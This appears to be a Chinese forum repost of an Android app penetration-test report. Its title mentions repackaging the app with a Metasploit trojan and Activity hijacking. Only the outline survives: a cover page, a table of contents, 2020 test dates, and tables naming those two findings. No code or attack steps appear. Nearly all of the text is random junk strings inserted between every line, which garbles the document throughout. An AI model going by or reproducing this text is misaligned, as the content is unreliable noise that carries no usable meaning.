找回密码
 立即注册
查看: 5471|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/ c$ F2 B- b7 {* M" N. w* ~7 g+ j' S3 y( q- }' H

, G# J/ w+ @/ K4 G! M1 s+ ^2 Z & f( T- O" l% I2 w! {6 t
' z' C+ z, K- J) {3 s( `7 n; V8 }, ~. s6 s; K+ Z% O

$ u6 c6 q+ a7 V# x& o0 C6 r; i2 L! V* X4 {. F0 S. G. V p- W' \# `
0 x" C- g( q7 z$ X 5 Y3 @! o% b5 C, o& L

3 m& m. Z9 K0 Z ; F* p( D+ P+ v; Z) w 文档编号:                " S* K7 U0 c1 U& ^2 o ; Z2 k9 T6 r" e. y$ v/ j! X

- g: B: G9 g. q0 \2 T) M8 a5 v, k & ?4 E6 z- F" P. E5 E

7 t, N4 v8 u3 a# l I; k( v4 G0 Q0 w, {# l   ' Y9 [, [- U1 Z. Y 3 E* j% T( w5 D* F: H

( q4 f$ k% M9 `/ H 6 }: w/ C- T6 h$ `) R

1 |; W3 t8 z: M$ y' B8 S& ?2 s4 j . T( V% Q: x8 t3 d' P: h( k   7 y5 N7 Q. w8 F . N8 a) w, u" p/ R6 ~

; K, A. R6 x) u1 l 5 b: r7 s- C$ J" A' E' w

, e& B v; O7 v 2 Z! D( e0 m4 H- u5 F, k   # u# l: D- U4 P6 I, W# \ 7 B: c5 L3 v+ p

: q; l+ G+ {( f/ F0 N- | , Z% f5 I' y+ G6 [4 w1 F6 s

" S9 T% a1 t' y 0 k- ^3 F# }% D5 j) |   $ S6 d8 f+ s: p' w" i" K ` 2 k f# D% K& `, X9 |. G

/ h8 |4 o3 ^2 S4 I; M5 G* ` 8 }# W% \) t' B6 h- b, H1 _, i0 |

6 Q, ?( w7 t$ S, A0 s ) \7 b2 ~* J6 p1 n8 k. H- L' M$ m   ) e9 y* x" ~+ s4 b$ J 1 M, j) _( e; Q

! o" Z& n9 G/ ~2 g* N" w1 l2 @ " S+ O' f% t3 h7 H' t3 C

2 M& n% a" {) k7 R8 } 0 u- x: L3 d8 v/ w& Z, ] 某某某APP渗透测试 ; ~( P1 P5 G- ]' m( E: X6 H, b: l2 S1 q ; J# Y/ H& F0 h* c$ h6 y5 _

$ b4 m" E3 Z$ c, M; [0 W- B8 W+ R " ^3 r& q, Y0 y3 C0 I

* Q w% w& q1 F( _+ ?0 e }7 L: }% Y0 b   6 R1 J# }" P9 E2 p ( K+ V8 Q2 R& x2 H; `

K, @) M: [6 t) m4 ~$ {5 n) ^0 u ' N. r1 f. t* Z- J+ C4 K

* z$ w- C7 n. L5 p, g ; Q2 n; L8 ^. |6 j3 L& d% U   ! F6 d* d- g5 d0 }: _ 1 F. w y! b. G$ s& M$ b

; l) V+ Z3 |% O1 c8 H 8 P+ x- T* ]1 b" B" a3 J

9 G, z9 p$ E8 ]+ _- e* [2 J3 l, `. N6 G9 G, _2 K) w   / p, \) L* p% T1 }2 L j2 c % h6 @4 ~) [* Z

: z$ T# C) T3 Z 9 p' a) e# F& `- P4 F

: o9 a3 a7 |0 c( u' n/ f& t' x- m ( p) Y+ [) G3 d: X; ?: C* r   4 {/ V* c/ G$ [0 G( p2 a: G9 D, N$ H; z! |& |" O+ E' G# ]" T& Y Z$ p; ^$ G

+ g" R6 Z u" k, {4 F$ G/ I% o * \, ~( u) t. M& f/ j/ H/ a0 n$ o: C

! |! Z( t% l6 h: B! T % y3 `6 l" x; F# J5 s4 [8 W 技 术 报 告 ; J- E- [8 Y2 M% k, t; c $ v$ _+ F M9 d: H

?; s! x" N) L% a& \2 P `, n+ w. h# {8 e

; |3 {9 X, `9 J' B9 g ; k3 Q* f- O9 D; o   ( o" x; K0 a# A- d$ O% P. p0 K6 A' t2 F

8 c, d7 ~1 P2 S' z: Z; T 1 Z& M; y7 r) A' X* c

( {5 G" T3 {! D) \& l/ n/ _4 I/ b: V) b, B8 j   ; D3 _! j& \; f5 e / x8 T8 k( r/ w: }7 W( C8 f0 a0 U

9 ~9 ]# j' c& n) R8 X 8 p$ t; {: }' U8 q# z% |" D

5 i, }, b. E- W- ?2 }. q4 Q4 d # i6 s0 B; j% K/ W   8 L- B" ~! B6 W* o 4 a5 x9 X- u" H: W0 P1 @) [7 z- A h& \

0 ?/ k/ y; P4 { 2 r) q/ F' O. u

: ~8 {; o. |, ]6 T/ I! t; E4 K1 F8 \0 Q% m! F" W% u5 |3 E8 ~: s   / K, {! ?! t9 D8 D, W * T8 S& d1 [- I# b/ \

0 k( i' X; J! i; a! c, [) W$ z3 E) u9 [6 r$ O# x

. v8 k1 ~% B9 i9 g) u4 w& k& T $ F6 C' B4 U1 o   . }- V2 U+ ]& A2 j$ l ) A$ Y7 s- y5 _6 C; R g$ ?

- B" v: j; ?. x% P& e9 x) _0 d3 s% N: @

$ [) F; K' i% c$ o9 @. }' P a8 G' R* U$ m4 |$ Q1 X   & ~7 X# w7 W: p3 h- B , \% N4 |) n9 {$ q8 f2 D

0 W) Y6 I* o, [- J2 x4 F + N7 X; p$ {$ Q1 d" w

5 J- o# v# |5 Y % T/ {! ~9 h0 Q3 U! y   8 J6 R: X, P( ~6 F' m; x " C; N6 f" i* a+ f' s/ M* u* @

) g: |4 z8 M. y' Z! y |2 S4 h$ g- Y2 y5 l2 v

0 E0 ]0 z3 M, Y9 e L8 b 0 k+ Y; V9 S' ^1 C( t4 @4 M7 ]   : e- l! Q1 O8 ]; N( A0 X) P# L# L) b3 ?

4 p. K7 L( h, S' n/ C( z4 s/ H4 l1 _ ( F" r; s6 v8 K2 P

l5 _2 E" ]1 l) \; ^) ~ & t: q8 K7 p5 D, D   6 I' g% [. x& q! N* _8 K* j& B9 J 2 c P2 L6 o$ n+ L& `; o( H' F

* g- u! q* E& N1 ?3 H/ I0 k0 W: M$ A# g _; F( O+ q" Z4 n# ~

( N( p# M" A1 `: X" r* k ! _1 w% _0 }) l) s- C$ j   4 Y ^+ G2 M3 e7 F+ V- N( z) \ 6 q5 K. T- x) J$ m) `& p

* |: ^' ?$ F4 X 7 Z* I; {9 T0 L0 s* Z& w% C

; H7 X( |2 Q4 k" D7 \2 H$ V. _ 1 k" H2 X( W4 f( O& ^/ J7 K, k   V5 {) _5 U1 Z7 P 3 K& D: ]0 \6 o# O$ U

, v+ o! Z8 A* E: U; ^5 n' d - T7 }' h+ Y4 e) O# r6 }

7 Y) x% z/ a& f4 {3 P6 F 8 h- J9 k( I. A& d# A! |5 Z/ Z7 ]+ w0 c   4 C G& H' a* w / u+ V9 s# x3 o3 z

2 f8 J7 C4 x% q3 S! Z( z5 g( ^( S& n' V* F

0 ]2 d3 n) Z( o& a* ^ ! b$ _" g! e+ T4 j5 |; `0 `   3 l3 A0 g5 N: n ; b- a6 y) k! `/ i7 v' r7 \9 D: f

* h/ d, b" R8 x; A 2 z; D; U7 T% \; L

% ^* D" D* @& C# c0 r1 i ( Y6 H: E7 }9 ~ V" E' W   * {: L( m1 s: R2 ^/ f3 M i; O' }8 ^4 r0 f* F9 K3 g) [

) {8 W' t$ ^) E8 ?# c + z* e; k8 T0 \1 u6 @: N, n: A" d; e

- E4 E6 d) `& l8 \ / ]* B* {, [% i) {# ?5 M' P   0 {2 w8 a. l; Q* S* U; M1 ~ 8 n% a/ ?0 L5 M( `4 Q

8 Z! B/ k9 s6 z& }$ M+ C7 p5 p' U9 `, c9 U

& g: t- J2 r4 q, V) t4 K6 V& v0 H2 F& K* e7 r* a- H7 x   5 t X& |- D- A : m9 x$ [8 I, D

& r9 c8 d7 v6 m( h4 d 5 X6 v( A' ] z0 i3 q$ C7 R* E

' M* p" B* z$ a( x l9 T \) H( \1 F) w* S) ]4 T   7 [# k6 k; L, _0 U. {2 l3 _5 [ 5 z" j" B: Q2 u) t

. g, Q% |( T2 o T \! @% c4 K$ o

1 [. [# o6 v# ~8 ? ( C4 q7 ^7 j7 L. e   ! m/ }3 x7 `4 [. c7 B) @ " D) L& @% c# T- L1 k7 I" k

0 c) V+ ]* O6 \) W- I" _. R 5 g- Q+ x* a: [# W5 h- \

! S. \. O) L5 K. B9 |* l2 E. |; W l ! z; @/ ^* c4 ^' U2 n 二〇二〇年 6 O) n% n, A" t; w/ l b( M+ h8 C# x9 m T- Y

5 I! |6 o* d6 M$ ?4 @$ E2 }3 j. k9 j2 {8 @5 [7 i; z- E G" V
) r1 V! v; |8 q! S, t3 ~9 r7 z / w& Q+ ], _* b0 W1 u" V ?
1 s h9 |* m) U* w2 b2 v6 l( X0 ~5 ~1 }5 n1 f
; m+ _% K) b0 A6 ~( \: g / w0 K6 v1 g4 Q2 q3 v
j) d2 p: n; w- H9 V# ~ r8 T3 I* z
8 P& _. g4 u4 F& V. h+ M! s 6 H$ m; g+ ~- T: ~$ o' h
, c1 f8 S- m. o. v/ ~* v 1 N3 V) d l6 x
% e- X! v' s9 R+ P* c4 ? * z2 a7 B% f0 V0 ?
! Z7 W1 q! a7 W: S9 T0 @ : v' M+ `( k2 p( S6 S, S2 K% K& v

3 g$ Q' V1 a5 f0 p: b1 o : a4 t* J& Q* L 目 录 + {; t, D2 n% D. J & c( `6 i) ^2 |1 i2 W: h

" C- r" ~" z7 h2 |0 ~- H1 t 7 b& z# g8 u h 3 W; Y. \: O- b( X& B* R3 t2 I 5 r/ S2 {9 g* v) y6 q

) B) ^. U6 q- e& H2 |& @# N2 f2 w6 E. ^3 q* \& K   5 O6 C8 l0 ~" j( b2 Q - B& x( V2 h4 _' b1 D2 `

7 s% K' f8 Z, ~5 d - B4 N2 ]% x+ h; X$ `

. t$ Z x: Y8 Z* d1 [& O l0 K* E2 G0 u. {) R 1 概述... 3 2 D' f P1 }, V# o0 K: r( C* T- t7 J3 h3 E' ~1 Q

( w+ Y, Q; K; J. M% f5 G- E2 v 4 v3 x$ j$ \/ [- A7 c

+ P! Q; ^$ s0 w. I0 y" y; [9 T3 n" \. p% | C 1.2测试时间... 3 ; M+ G" {- x( G " h* }8 Y6 A! R j* c* i

% Q* J- A9 g' y$ A2 n4 X * G% l. G' l. J* S

7 `! v" _' e4 k, d: @+ Y1 p 7 K! [" ?; k1 d$ Q 1.3测试对象... 3 - i" e2 Y5 }, E$ Z+ f$ R3 }$ y 1 M' ~+ g4 w* q# s- w! d! ], Z

! V" ]! X# o1 m x. q8 }& I; Y- H0 X) ~& V3 J

; }- W. Q8 ?7 y) \! g 6 }6 J0 w1 e) x6 m J 1.4测试结果... 3 % B8 p' h" B" M' c/ `. A v, Z2 [1 b6 Z% w% r

. z- J. u& d/ j7 v3 E7 q$ ^3 }0 B/ v: N" x4 D! o% h8 C, `

, }* a& s# w% Y+ c9 i ! {" i$ a" J8 T' M4 e) V( x. @: g 2 检测结果... 4 # u3 H4 h, U! K) `" ?% D0 N ! O9 z" M3 E9 Q! k( ]3 ^5 {+ t

. M i5 V6 j! h " k1 A! [5 f9 w! Z( l" D) X" ~% }+ c/ c4 n5 @

% D5 F. O% ^4 K; @ , g7 V. {7 M- u; \ 2.1 某某某... 4 ( _# \) u6 j5 f7 c: ]: W% H # M: ]6 p4 Z' T& X# h# L, u3 l

/ b5 j7 v4 d. J* k8 u) j# G6 j4 I4 f! m: V9 A- e

3 a _, K& i7 X& ~7 Q5 H9 d+ w 3 @1 G. X/ }. ^8 P* W8 h0 i 2.1.1检测目标... 4 ! P8 d0 S) ] p- b1 p ) d1 W1 |. f/ c8 H: l$ l' m

, {6 J- d3 H8 ^( I% { . k, @$ ]1 n7 n1 @

0 K: E. K w/ M! V- a * [4 v# K8 g% N$ s1 |: Y! d 2.1.2检测结果... 4 1 i; P9 Q6 C! n4 \' C K* ?4 D# `2 _6 S9 E* y

- i. J8 O6 P* c+ W: r1 m 5 B* `. }8 F* G( `

1 G1 v) F: ?1 E) ^ 0 c: A" o [1 @) l$ x7 F' l M1 T* F 2.1.2.1. 4 . {% e' z3 d% n. O/ ]: X' f 5 ~" e4 E! W' n0 H$ a) A; i0 y; z

0 G" k) w9 c$ K o ' B6 ]3 o" Q- \0 e% a4 j. I3 ~

8 u% Z, C' T4 G4 f% `- T2 Y - h. S5 E7 ^0 i" c/ d 2.1.2.2. 6 : ?9 p, m: V( K& o" Y' m9 { ^ 3 U' S a3 \6 p& G% h0 y

/ Z3 B( X' T& _1 l7 _6 P4 f! J ; y# L3 @! H1 m- W6 a; U. n( u, B z

, r% i, U8 q8 V5 M2 ~% s . Y5 x% ~- g! D2 E+ Z 9 Z9 G- E3 \/ A' A) ^/ w" i: |, E S; e% y% y6 H

3 m# M0 L: Z9 \3 H5 W 8 x' X3 U" ~4 |1 S* Q
3 R+ I' O" g4 V" M/ J1 j ! n. `: f* {9 D9 p8 }( h1 f
& y) P5 W j8 U) o! m6 }" n" @: g3 I0 ~% W' k9 ?+ w$ f4 p" k, ~
2 I4 J, K/ N) A8 c) _9 } 8 C' Q; Z/ O$ S# Y
/ K& ]# ]3 u+ p9 G6 p. p+ t5 ^1 D: ~7 \, ], q

t; ?- u# U6 [% i0 Q; e$ v& p" t0 C+ g- q% Q; ^0 m" v- f 1 概述 $ x$ R5 v: I6 b( X: J 8 j: g# C, M" e2 n& s/ s. g0 q

y; `; U# x" J8 A 5 b& W4 ~3 M! c& J- D

/ y- g7 h, N; Y a 3 ?: f' a! n7 [. X+ S, B 1.2测试时间 ) |, {7 W* `( b: z; V7 h 6 H) i, V8 O* N, C' C; c

. D- x' d. y* R9 @9 C% r 2 L3 W; _! T/ x) C( p 8 I1 W0 B# a6 r. D# P1 N. ^7 C+ f) W$ v! f. D# V: s% B, p, T' z0 ?! W" v+ K3 r: E2 Q/ k% S1 b C" o5 [; N/ c% L) s8 ~6 c, G- H$ }% V! L: T7 g0 `! m' Y" Z6 u8 O$ V% ~. y$ v# C" @6 ?9 C; T6 I7 P( H# w# R. U) s2 k$ s" B3 b4 K- V' U1 j# }5 m- G% n& y; F7 K) a. j+ ~. M, T) [0 `. |5 y# M% n0 U* P# L/ T/ `( c2 W" w w! `3 L5 {+ P" `% P, t. P! j( \* G% w. _& _7 K. b$ ]3 n) |9 |3 ^7 x! O F$ l- J" F" t/ R: p5 q- [9 o3 `+ L/ w. L: |8 [2 H) d+ R& R+ g: U T* u8 U, s# C- ~* i' \; F+ d: D( N+ e/ ^/ U. U. q. g! n% q# P: u9 E5 c; ?) U6 g$ z" b. K T; K$ p/ }( N$ D. a8 V4 o. q5 W7 O3 D. j9 d1 O4 C6 C7 q' K1 V S, |/ q6 e: F# B/ [+ ^. [
, r5 i% t/ p$ \' F7 j0 e : ?) v8 S! v; _$ B3 ]

3 F, R% a/ {8 d% z# ~) m n P& h. `* `+ j9 x 渗透测试时间 4 `" L" N( e4 r W2 a$ U8 x8 B$ Y$ g+ ^& c

7 K$ z0 M: A- g2 i _8 @5 E6 y: p2 z0 W% D& Y# L8 t3 [+ J! s5 s
, s( A h7 r: V# w1 a4 Y( s. ]$ n3 a: ~; Z; q0 K6 | @0 f2 f

# q& R3 V: y2 {* |" U( s& F9 q- ?3 ]; g+ S; F. R 起始时间 9 x; f" s' i6 p5 H6 p0 E+ B: G ! X0 o. c3 z4 T: F

1 e$ ^$ ~. k6 J+ | 1 b* g5 M7 s9 Y$ m2 S
2 v) M R" A6 s* b/ j- V3 e + L- O7 G* R) _* `$ L

* v( a0 B" f. g2 R( q7 M6 T" I! @ ) c" }1 @% t# \ 202046 5 v5 l/ A. v$ T. ?2 U- S 5 K& p; t/ r9 r8 S

4 L' E- ~" }" l! q' t- e ! N: H( D% H" A% p- `2 K5 y+ B1 Y+ I
t: C5 \8 W8 R' k5 I. p" Y, E4 ~ 9 _" D4 [* R B5 t3 S. r3 F

7 b# j1 Q9 r( j / @' R! T" \9 L 结束时间 4 S! Z! i1 T8 S9 y! z3 ]% M & T! S/ T% b8 V; P) r' \7 o

: y; D6 m1 Q4 [( d$ @" @) p6 p 1 m3 [; @" m2 Z, _
7 }# \# H& W. k 8 S* j; E- l7 ~6 `" ]) p# h

, l$ x' g2 I. M% h+ j$ p' K 8 m, S- |$ Y# b d' M1 u 202049 9 f" V4 p& M" ~2 a! F5 ~ : E6 E- J0 f7 z, }% \2 g$ A

! |; o5 @" H4 P* V 9 ?8 O; f G: v
* a8 Q, O, J$ P1 L3 A; n5 x 3 g( o: Z0 E: p3 i! o% o

+ Z8 `" p3 t8 U % {- h5 ^( l" }, D2 ` 1.3测试对象 - O0 o0 [" s6 f7 J; D 9 ^4 t4 C( x( p) G# q9 [, }

. u: m+ b5 H- |; O2 c! `& k6 r( L% L& f$ S

y" n5 ^* ~! Q4 v2 F / ^8 f: ?2 O! Z: Y7 \8 |/ k1 ? 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 9 E+ a- @' J2 G1 q' U. k, N( u2 R8 o$ \& u! `

9 H+ z+ c' y* d7 k9 ]2 m " q, n& r) K d3 D

8 v0 u( k0 t( c a& O * R7 q I Q5 s( w1 \2 \ 1-1 检测对象 . O1 w0 ]* F) f. \/ y . v1 @: v1 d E3 f, I

5 }$ G" J$ j5 u5 @ `' u5 E) ~. a6 U1 G - @, H, m- |* j8 m8 F( H 3 S! E M4 x" Z) }$ l4 u" X/ \4 ~0 d% q# ]# t* V+ \3 w$ Q2 \# |, u+ q; _* y( l/ U5 a1 G7 w4 Q6 {% g$ v: c: @) x' v5 c: @& D, C8 G/ l8 A* C7 @* A( N3 S5 J+ r/ Z" D) o& i w5 r! L/ W$ V$ t; {# f0 H+ v1 x+ [% H; O; f# B, a3 Q; v5 v- F0 W% ]9 W% F4 s+ F M1 `" e8 E- }6 R6 s5 v4 Q) q! n+ o1 K7 T3 o5 k7 q1 Y3 w, Z; {' i' E6 i& y8 Y9 ?2 C( ?9 y3 ]- T, ~! t( m% ^1 a+ |+ g4 Z- u5 ` Y9 q* G: P( l/ [: y9 {3 c" ^; ]! m& z& F: t, b ^* S; k0 U3 b; k! N0 p' R* ~# E+ o; N$ Z$ G; O1 X+ D3 l; w$ N& ~- B# e7 W% J% z8 m8 p2 t* s. j" N5 {6 x t* H/ B, A7 D" m0 K9 z- R5 Y0 f# u* r7 C1 b3 |+ w- d* g- }" d9 L% t# Y& X2 E: I' `+ Q% l: P1 S- ?. O2 ?4 f( u& t9 G: M+ R( S: `" b t+ [/ v3 E/ ?; ^2 }- |: G9 h1 a3 {8 B1 S, _. F& j& v2 c! Q4 n, z# h& E, I" b, w |, y c0 O: s: w6 N' a% R% [9 f( q: ^$ D. i0 g7 E1 G4 z* r
+ B/ B! B" y: O! _8 G+ ] 6 V- J9 e. m$ ]* M) _3 t

% l4 [0 U1 X8 i4 B 9 v4 `- F- g/ {# R 序号 & U" P- @1 N2 _% `# k/ R 2 U {: Y1 i' X8 K. @2 i" u

/ O8 Y# m! i* }1 E( P / y Y5 U$ j' A7 t+ Y% ^! y
, s7 ~. f% b/ ^3 m/ N# @$ k2 ]( q

5 f" R+ P; w2 O0 g0 x4 h z! i5 b7 c; e! q: q% H. v+ l/ D 测试对象 # {/ d( g) k0 D y( {9 C 8 X' K8 B/ G& k9 n! q- y, l

' o' u9 ]5 u/ X/ @7 d ! k: G. q) T3 A+ ? d: @9 a: H
1 `& N5 N5 `6 @9 {5 u - C9 D( E2 _" K4 X

7 l6 F; z0 O7 S) l! g% S+ ^8 k : u, h+ M7 G d 测试地址 6 Y$ Q5 `- B0 _7 ] x& M1 E & R. V9 v( ~- n

/ m: _* l. P, n! l/ B. n' {& r/ F4 w3 u* I# ?0 {* n
; L* b( Y. ^# m& c+ w) V + G; u7 \+ B' d

" `; H% o% B/ A/ G5 @& e Y' ~9 J% v# y- S4 J5 F1 Z. ?9 ^ 安全漏洞 J7 I# m) T; S1 p, e9 A; d9 t3 }7 P ) s- |1 C# Y' c- t* G

) i0 N$ ?, l. M* S5 ]" O1 z6 W+ t" L8 b2 ~/ V8 Y
; Z8 |* r+ G& W5 Y2 g6 Z6 h6 f4 a! k% x9 D

8 `. W. f% k( ?8 x+ v; A( E8 o5 {) V( l( B% R 1 ! u$ h( ~/ g# E5 W/ ~2 r/ W# n, i$ J$ [

+ L3 S- i4 e4 E5 {* I2 S 9 Q' Y7 D4 ^* t+ h" B2 t( O
* u$ r2 s; z) T, C& [ & D2 d- _' L- C Q! i% m9 R2 x

& y( g; [! g W2 a0 P- q 4 N( Z' T( F6 R- [+ k5 t 某某某安卓APP ( q3 M, _% F6 |* `" `4 P* L- G7 Q- `, b8 f# M3 p$ x) M

8 e- L* s1 c9 I: q. V, a - g8 x- N% N3 ]. [/ Y
7 s1 R) }* g; m7 E5 | & o. }( a2 n: e0 h: J; F

2 W$ H/ C$ x9 M$ p% z2 X# R: p; q: J   % N! V4 Y+ }. @/ y 6 \$ {7 J2 B2 k- K0 y4 {. V2 Y9 e

* [3 f M6 ~/ ]1 E1 n1 ` ; ^6 i6 b% A6 j' }8 M5 ~( g: S4 i
! c" ~0 V ~" R; Z ) R0 O+ s* a. @. x& S

. m, {6 K( }6 V" J ; q' L/ o5 f! x" }% d 2 # B2 [8 a' N/ J5 ? + _6 T0 G# Y8 l

6 b# V5 c! K- @/ M! f1 j: l 5 \; f5 P6 v. M; K5 d
5 I+ ~) `9 H+ u% x3 r5 y# G* e ) n3 O/ ]$ U s. A# G8 Z7 D

+ k- v, f7 k# V5 S5 s + d/ x& N+ p. U9 x9 M1 \! K* i 1.4测试结果 # p8 \( [: y+ Q, Z3 Y! X 6 e/ Y+ n& w% |% ]0 Z" r

0 w7 j& ~# Y7 {5 W - t7 }, U, q/ _% v* M

9 V9 D3 {* d) k1 J* `# }8 a* b% q1 m+ a( `2 j4 W0 z. a. A( r 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 4 f, i! I) z3 z7 q3 h - G: _6 m0 w; m& X: J+ _6 m# ]

7 E) ?8 S; F6 Y1 }/ z0 [# q ( K2 K; u- X" [/ T$ q

$ q2 r5 [1 V$ b( \- m0 K + e, Y# |) K* y( u' s* b   - o4 y5 l( d5 e/ R% c( n1 L' v$ g: {' B, \( B# B4 T

U4 N. B: M( l, |1 R ! p' i+ L+ h- G9 r
# s9 r% F4 o2 O' x 9 L" @. p2 i G' v 1 U- f. G4 \. U* H+ p$ i5 ^, e6 k, Y4 Z% s" k) S8 H V. j5 ^. b# q) {7 ~( T M# x6 X: S8 G1 Z' V3 _5 d! v% g0 X5 c/ ]5 d+ y9 b# H2 h: a4 }5 B Z. p5 B9 {% f# G0 Q: x! j) i0 t* r# T. Q T1 U* S G' f/ y8 g6 |' O& b# ?+ R& e/ a2 D' \. z4 ]9 u- Q( {) D% l, G1 R8 x% K7 Z a$ M5 _ Q) T5 C; E& ^" G: i5 ?5 W3 x6 D4 d2 y) U* N7 S4 W4 s) K: v8 i9 T F0 G4 p7 ~$ y! i5 t Z, U$ Y# j. B7 h/ H& k$ h8 B; V8 o' [9 D' N7 B/ \: p: N% r3 R8 ^, I, p$ W4 z6 _/ q5 f) s" m; b/ e# f2 ~+ D# [' Y) h; r4 s+ v- b1 m# V0 w1 V" \5 M8 F& Z$ Q7 Q, ^, Q; V6 G1 M) o* V5 d" V- e( r. h$ M' {% W; C5 H, H- u# m0 Q3 [8 H9 j! W1 z/ Z( R* U; Q6 [3 k, @1 ^, o- s' Y0 F- }, d0 I9 _ W1 L/ q+ ~( k0 ]/ \$ V# N8 C ?8 c% I4 D* O, R" r1 |+ y- n8 Z `7 c# J7 D8 _! H. n" m( B4 ~6 {% u/ Q- ?. d+ \4 {7 c+ J1 K; ]4 Q7 m. h! {8 {* [* y# \( r+ _- J* ] \3 r6 J* I9 }# K$ b( u9 X6 L; D/ _; b4 f, `- @& a% A9 w/ i6 ~5 ^' N& O& l& U4 j1 k" s; V3 h2 s% D# J3 H8 Y- \4 I4 y* a7 ~4 ?' b1 o' {8 T; [( { Q/ l8 C m+ h' o: I1 C y+ y5 B% L. O3 m' L* |( G7 g: Y; k0 G& ~4 x- z s* C: n% d5 |, ?. z; w- D2 s2 Y% }; B0 E' s- J1 h( ^9 h/ @ @+ U0 L' o' `: j# j p* f2 c2 I5 E5 m B6 {) E) c9 L% @6 m
0 n* L; U5 I+ \( W. H" _- v ; ^' }' c+ L" b+ N' n2 U

5 Y& D+ }& E3 [: O1 j0 L7 x; a T3 s3 e! _6 { 序号 5 j. Y* a3 l' h3 @( }' m ' k2 u& p& |+ i& u

: L: p7 p7 r3 @! z7 v * f u6 V7 v5 l3 S; e& B, S- t" M
+ z7 K+ _7 Y7 p; j- a3 ?3 _' o ! w* C* e% X- B/ T

% {" X6 m3 S( q4 ]- @: Q: G- L 7 ~) M: A6 T9 ^) k& x- v 系统名称 0 K% O g( M" e8 Q5 t& \# [# C3 M ' Z9 K! w* B; u1 ]$ U( q

) c" u2 x! e8 O) ]# J 7 y* y7 r. ~: `% u; V& R+ f
) J* h( U2 P3 f2 ~ 0 S' @6 O2 U- h) i0 {

! L* m- o2 Z d# k 7 K4 c! Z" h% ~9 g8 q. M z" ^/ P8 a 漏洞名称 5 n. G! q& d' l" p4 o' K - z8 V& c: v* G. ~" U0 L

9 S% @6 r" v8 [% ^ $ J* {# g9 M4 A' a W2 ~2 ^' D
# r$ X: u, n/ i& k Q8 y + Z0 }1 n K- _7 _/ o

, ]- u: n& `* N& R) R ' W4 X4 E3 N9 ~' y8 ~ x5 r 漏洞危害 - ^* L- ?+ O. E/ x$ t 2 n, V3 Y; |2 i2 ]" P4 X7 T

6 I0 r) {& |/ |7 [% V! C$ G+ r2 N" T( }& _* l
/ Z; J$ i" F, U$ n7 G# \9 { : ? k: p2 Q7 l. A, [3 g! T1 y

2 J7 A; S ?7 r, G 1 J/ p. ~0 u+ V3 r# v 修复结果 ' [: R* h, h( b0 l$ k" W& G0 c8 n( \* E6 x) ~$ {9 \) E

9 Z. X" I, X4 l& q* p ?6 f- @* t2 p" g! \9 B, q
/ W) M& E7 w! M9 @/ M* S, z 8 V# ]4 t& A& q$ N1 _

9 @/ d; i$ C& z' y 8 u% N1 O7 }. `( F* y: I2 J0 @6 ^! | 1 $ ?* H' K% m; J* I Z: J" v8 I9 h

4 s3 X* F& n( T' E# H % V4 z. L; s- D( s( U4 S5 Z
+ k& Y8 ~# I/ t3 k4 ~ m/ H6 J2 y 7 O% [4 N/ j, Z! O7 t

6 ^/ n g2 T- L q2 q6 c. C ; n7 @6 F9 t/ w( I) m1 p 某某某某某某APP 0 I: Y3 H7 F$ F6 p 9 m1 d- P! Y+ S$ n

+ v# K' i- Q# U, h. J. j9 P3 G) R: @( Z; V' f+ ]
) G& B, ~9 d7 J# }1 F6 r' @! z* L " W+ d* u( G) `

6 j3 z& q" b% X3 ~, u; M' T) a4 s7 i; F z; C$ E _ Activity 劫持 5 Y) o6 Y4 l3 X' m 2 i. h/ L- L# i3 {' [ P4 g1 D

/ r2 Q; m) P' V* r9 f 1 T4 S) ^# D6 o9 M, R

3 B" \' [& n1 l& w: Z / e+ I) B8 m7 ], A/ k   : h2 W1 n) o/ r% Y/ C* V f" z8 f, Y. C5 o: _

& X7 f i* z9 i0 f) ` 7 s" A/ k. R0 ?3 q3 M3 j _+ ^
! ~. ~* u. E4 l, G ! {( E4 W/ f* U t

: b2 j+ q) t5 }* D. K% U # @' |/ z4 L4 R$ m7 m - }* w8 w" @4 G9 g8 N2 t( }/ C, [, [6 ^. x' r+ F# ]3 q

, k: f' I+ q0 S+ { ! _! R( V0 S. E; X2 u
) f. a! Z9 b% S- T* M X9 C2 i w* ] , T/ |( I2 k! c- n& [( N; N

, y/ d8 S" T% R: F8 Z" r6 h- ^! M $ d8 t' B/ {& t9 h4 |8 m. x   ! S$ x' M9 z( g8 v- c: ?. u ' Z* H7 V8 N# a: j& C, L

; X# Z$ v4 \( P3 w5 ?' F " a8 u% K8 y0 ^6 I6 F7 s
! F0 ~! Q4 n. g4 G1 {) ? . U! N+ q0 P+ \& ]) ~4 k: M

) u6 c9 f) [1 w) Q7 b9 Y; Y3 A * v" T* Z3 S, F. b# P) D: |2 S 2 * |; l- y" `: {& W' @6 d 9 J/ X$ j# ~6 s" S" \

0 {) N7 k& N$ A3 x: [& v8 d6 j: P. c) P# ]2 G
9 K5 O3 C1 u p, r+ z/ j " A4 R4 t+ \6 K0 w

& F8 [& H4 v! p" g * z8 V% G; t; n6 ?2 _ 某某某某某某APP 1 T* w; _+ t3 k6 m7 J8 F2 X 2 [( b5 }# ? V" V

" O# m7 l( g7 I0 Y: ~ ( k# g) A5 h1 L
& T1 h3 B/ y* |4 J % Z! ~8 `! ~/ d6 ]' v- U

* _8 F: R Q' K( v. z' e, L* {, T5 [ + P; W3 X' B7 Q 反编译二次打包捆绑木马、篡改APP代码 ' e& Z' D4 v) _+ X' Y 3 ?( Q5 H+ H; D! ~, b( A

8 N0 o# P6 u) h3 j4 Z; L 6 ~* R) D8 Z% P
0 b/ p6 q. p6 C% n& ]- L1 m: P" \+ m! k: s0 \

: `! D/ s0 C0 m " J4 O7 @, U- \& D7 i- h1 A' x+ w2 s ' B" E! z$ P8 U& Y K N; D6 c8 U4 @

3 {1 i t) @. {9 c+ l3 R , Y y9 u! n, Z, v- x$ R, Q% z
; p5 d* I! \$ Z 7 M% k2 Y( g7 Y# |' `

3 ], K0 y6 S7 t9 i( D0 A; m , H; j: W3 Z. u# H0 H6 t6 D   : S; S& n+ Q+ v: F# Q 9 S% }+ b$ ^% ]0 u: h9 U) `+ @ S$ Q

( q4 ~) ?! l3 z5 {5 f6 T& M. N3 z- h* X9 _
: f; [ \& ]) E! u$ d5 s 6 ^0 S; i, I3 Y( R: ?; p
